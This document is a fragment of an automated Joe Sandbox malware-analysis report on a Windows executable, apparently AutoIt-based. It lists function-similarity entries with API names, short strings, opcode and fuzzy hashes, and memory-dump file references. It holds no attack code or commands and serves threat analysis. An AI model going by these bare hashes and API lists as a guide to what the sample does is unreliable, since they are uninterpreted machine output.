                                                                            • String ID: C:\Users\user\Desktop\file.exe
                                                                            • API String ID: 3307058713-1957095476
                                                                            • Opcode ID: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                            • Instruction ID: b9b01df6876019c258514e0928669051e06cfb8da105dea2e0b7f3a71cecfce3
                                                                            • Opcode Fuzzy Hash: d66799c7fb8d49ba8911ba2da8beafd52f849db9660eadf2b3aeaa59b2ad0887
                                                                            • Instruction Fuzzy Hash: 8C41C076A08E46A9E724FF3198415B9ABA5FF45BD4B948031E90E47B45DF3CE4638320
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                            • String ID: static
                                                                            • API String ID: 3467290483-2160076837
                                                                            • Opcode ID: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                            • Instruction ID: 48203c673263241ac1db62d764cfaeea5ecdf39706ed69c1a678470693eee6b5
                                                                            • Opcode Fuzzy Hash: a4bdc31031acf25a780acb8ebad28d815df5c0ae00d3c31ea018055d33185612
                                                                            • Instruction Fuzzy Hash: F4412E325086C2C6D670AF25E440BAEB7A1FB84791F504235EBE903A99DF3CD492CB50
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidehtonsinet_addr
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 2496851823-2422070025
                                                                            • Opcode ID: 2620319c3ff5b6f33e90d7d8a3306f43cafe9a98b61cebff61261b881329dcf7
                                                                            • Instruction ID: 1da163f6d7ebc07d717bcc27a4c735f12ac5f11589f592499e4783d42e06de2c
                                                                            • Opcode Fuzzy Hash: 2620319c3ff5b6f33e90d7d8a3306f43cafe9a98b61cebff61261b881329dcf7
                                                                            • Instruction Fuzzy Hash: B531CD32A1875281EF20AB36E854A7CAB60FF54BD4F998532DA5E43391DE3CD5678320
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _snwprintf
                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                            • API String ID: 3988819677-2584243854
                                                                            • Opcode ID: 7f6e43a92c0acba8555e010e69358058dd97d89251a2d077eb91c839043e6aa2
                                                                            • Instruction ID: 32c00f25418fc893439a36068770f9d1d035d660efe6f3b28970d0624782b9a2
                                                                            • Opcode Fuzzy Hash: 7f6e43a92c0acba8555e010e69358058dd97d89251a2d077eb91c839043e6aa2
                                                                            • Instruction Fuzzy Hash: 0A316D72B08B0299EB20EB75E4519ECAB61FB457C4F844032DA0D17B55DF38E56BC350
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateMessageObjectSendStock
                                                                            • String ID: $SysTabControl32
                                                                            • API String ID: 2080134422-3143400907
                                                                            • Opcode ID: 4b08ff91003b18836ab118b9c601df15ff86c0835b21660893d535a527a01a93
                                                                            • Instruction ID: a142da03f300d5aa72825d7774707b4c2d538f01f38568da7a29ec7d79ac4966
                                                                            • Opcode Fuzzy Hash: 4b08ff91003b18836ab118b9c601df15ff86c0835b21660893d535a527a01a93
                                                                            • Instruction Fuzzy Hash: 0D3159325087C1CAE770DF25E444B5ABBA0F784BB4F544339EAA817AD8CB38D4928F10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandleType
                                                                            • String ID: @
                                                                            • API String ID: 3000768030-2766056989
                                                                            • Opcode ID: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                            • Instruction ID: 4061d079c079c48f81a180cd37b8afb09a56c241b9e8922b471beed1de44e508
                                                                            • Opcode Fuzzy Hash: 6504a464ad744481ce6bc1c71c4353ab51ac4f53e5ce451b4dcbbfd06c50b848
                                                                            • Instruction Fuzzy Hash: 6521E522A08E4681EF70AB359494538AA50FB857B4F685335D66E077D4CE3CD8A3C3B0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                            • String ID: static
                                                                            • API String ID: 1983116058-2160076837
                                                                            • Opcode ID: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                            • Instruction ID: ba00c6025d9a25d3650b33a2d97c1dcb233488cb799b672719ee79e316c66e3f
                                                                            • Opcode Fuzzy Hash: 2cf77c951f50a5aa7b90eeaf8a6614b83960d367aa0043a5ee29e49d78538776
                                                                            • Instruction Fuzzy Hash: 50311B72A087818BD734DF29E444B5ABBA5F788790F504239DB9943B98DB3CE851CF10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                            • String ID: Combobox
                                                                            • API String ID: 1025951953-2096851135
                                                                            • Opcode ID: 2751fdadd79cc3ffc02769d349f49088ee270364174e6e284d45ea2163805565
                                                                            • Instruction ID: 2c0e22ade9e883a540c134a27652e84d1452d6d93f206fd109b68aaf257c98aa
                                                                            • Opcode Fuzzy Hash: 2751fdadd79cc3ffc02769d349f49088ee270364174e6e284d45ea2163805565
                                                                            • Instruction Fuzzy Hash: 61312C32608781C6E770DF25B444B5AB7A5F785790F504235EAA903B99CB3DD856CF10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: edit
                                                                            • API String ID: 2978978980-2167791130
                                                                            • Opcode ID: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                            • Instruction ID: f6e9529b43ae95a416a19a6d1389347e9f722c3ed05b946f3529baa4cdbdf8ce
                                                                            • Opcode Fuzzy Hash: 7385061f885e14c89e765babf531e3acc6228f8566b1a940e972c4d460c7f125
                                                                            • Instruction Fuzzy Hash: 69311E36A08781CAE770DB25E444B5AB7A1FB847A0F544235EAAC43B98DB3CD856CF11
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _handle_error
                                                                            • String ID: "$pow
                                                                            • API String ID: 1757819995-713443511
                                                                            • Opcode ID: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                            • Instruction ID: 6d0df52d52945d7d3ed94491845b13ab1e8166ad7d146a8cb03354844b89ca62
                                                                            • Opcode Fuzzy Hash: 2773d63829b6bc9e243f88705d039ab02ec385488ae35a30c1ce332e33ed45c5
                                                                            • Instruction Fuzzy Hash: 98216D76D1CA8583D370DF20E044B7AFEA0FBDA384F606325F2890A955CBBDD0929B10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3678867486-1403004172
                                                                            • Opcode ID: 2b20666184da16acd2d6d3491877ae16e073837e1e892be99d2699d4247cfda1
                                                                            • Instruction ID: bc804b25ff9e40ae91cf600cc526f7e353fa3486e3d49a56c327c0da37f34ad2
                                                                            • Opcode Fuzzy Hash: 2b20666184da16acd2d6d3491877ae16e073837e1e892be99d2699d4247cfda1
                                                                            • Instruction Fuzzy Hash: B511AF32A1868191E624EB25D4404FDA761FB95BE0FC44231E9AC477DADE3CE527C720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$OpenOption
                                                                            • String ID: <local>
                                                                            • API String ID: 942729171-4266983199
                                                                            • Opcode ID: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                            • Instruction ID: 0560009c6b02567d295c12b0d34280a10bcc451472309010611151037fddb989
                                                                            • Opcode Fuzzy Hash: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                            • Instruction Fuzzy Hash: 9911C836A186418AE7B09F21E400BBDA7A1EB80F88FE44035DA4D06A98CF3DD893C714
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3678867486-1403004172
                                                                            • Opcode ID: 4b68288faa5a15cc7d232deff94305a842367b5fb3c5c30fdfadb4679d6d4acd
                                                                            • Instruction ID: e27de99eb66e3512311953a8a0d1315b85a2fa1c3522ffff70e6e8a8fab8d014
                                                                            • Opcode Fuzzy Hash: 4b68288faa5a15cc7d232deff94305a842367b5fb3c5c30fdfadb4679d6d4acd
                                                                            • Instruction Fuzzy Hash: 5A119421A1C68292EE30B730E1546F9A750FF957C0FC44131E98D07A8ADF2CE617CB20
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3678867486-1403004172
                                                                            • Opcode ID: 0abfc2817ed25deed9a0e18655eb97a5d75c75eb1aeec992e87202f854050b8e
                                                                            • Instruction ID: 94de408f94028859f7974ded8b3dc4e527dd45258b5d047a997da758dea706e5
                                                                            • Opcode Fuzzy Hash: 0abfc2817ed25deed9a0e18655eb97a5d75c75eb1aeec992e87202f854050b8e
                                                                            • Instruction Fuzzy Hash: 1F114222A1868292FA30BB20E0555F9E760FF997C4FC45531E98D07B99DF2CE617CB60
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3712363035-3916222277
                                                                            • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                            • Instruction ID: fa31f0ec90d660964eae4e9f94359035447abb648bdcc952eb59eecc3cbb2c6c
                                                                            • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                            • Instruction Fuzzy Hash: 65114C31A186428AE720EF22F90066AB7A1FB847E0F854135EA4947A65CF3CD092CB20
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 3678867486-1403004172
                                                                            • Opcode ID: 644f3703e788e93edd25f4b597ff0776f93010d0d499e8dd033eb9cd600cdda9
                                                                            • Instruction ID: f5a555577c8931174bb11353d586f8bd8536925e86e8460e26b61a0bf98478bb
                                                                            • Opcode Fuzzy Hash: 644f3703e788e93edd25f4b597ff0776f93010d0d499e8dd033eb9cd600cdda9
                                                                            • Instruction Fuzzy Hash: A8016522A2C54291EA30F734E1915FDA760FF953D4FC05131E59D07A9ADE2CE62ACB21
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _ctrlfp_handle_error_raise_exc
                                                                            • String ID: !$tan
                                                                            • API String ID: 3384550415-2428968949
                                                                            • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                            • Instruction ID: ad40b204d77f8b8b04b5e335a61f779cdfcac070385703f0ece371596a1cd341
                                                                            • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                            • Instruction Fuzzy Hash: A101B931E28B8545DA24DF22A40073AAA62FFDA7D4F905334E95E0BF84EF7CD1919B00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _ctrlfp_handle_error_raise_exc
                                                                            • String ID: !$cos
                                                                            • API String ID: 3384550415-1949035351
                                                                            • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                            • Instruction ID: 05c2cc8917859f5f18a4d6f528a0f5816f834639df037839b4ee19feb53fd7cc
                                                                            • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                            • Instruction Fuzzy Hash: D701D871E28B8941D624DF32940073AAA62BFDA7D4F904334E95F0AF84EF7DD0A15B00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _ctrlfp_handle_error_raise_exc
                                                                            • String ID: !$sin
                                                                            • API String ID: 3384550415-1565623160
                                                                            • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                            • Instruction ID: 821115f795ec0fd51e4ed838bfab1b64bcf36cf41cf539a8092396f20a5aa132
                                                                            • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                            • Instruction Fuzzy Hash: 2501D872E28B8545D624DF32940073AAA62BFDA7D4F904334E95E0AF84EF7DD0915B00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _handle_error
                                                                            • String ID: "$exp
                                                                            • API String ID: 1757819995-2878093337
                                                                            • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                            • Instruction ID: 81c15f8cc293ffdae5634767fefad5327702aa43d270a86c2c9d6a162e9749be
                                                                            • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                            • Instruction Fuzzy Hash: 0101A536D38A8886E230DF35D4456AABAB0FFEA344F605315E7451AA60CB7DD4D29B00
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
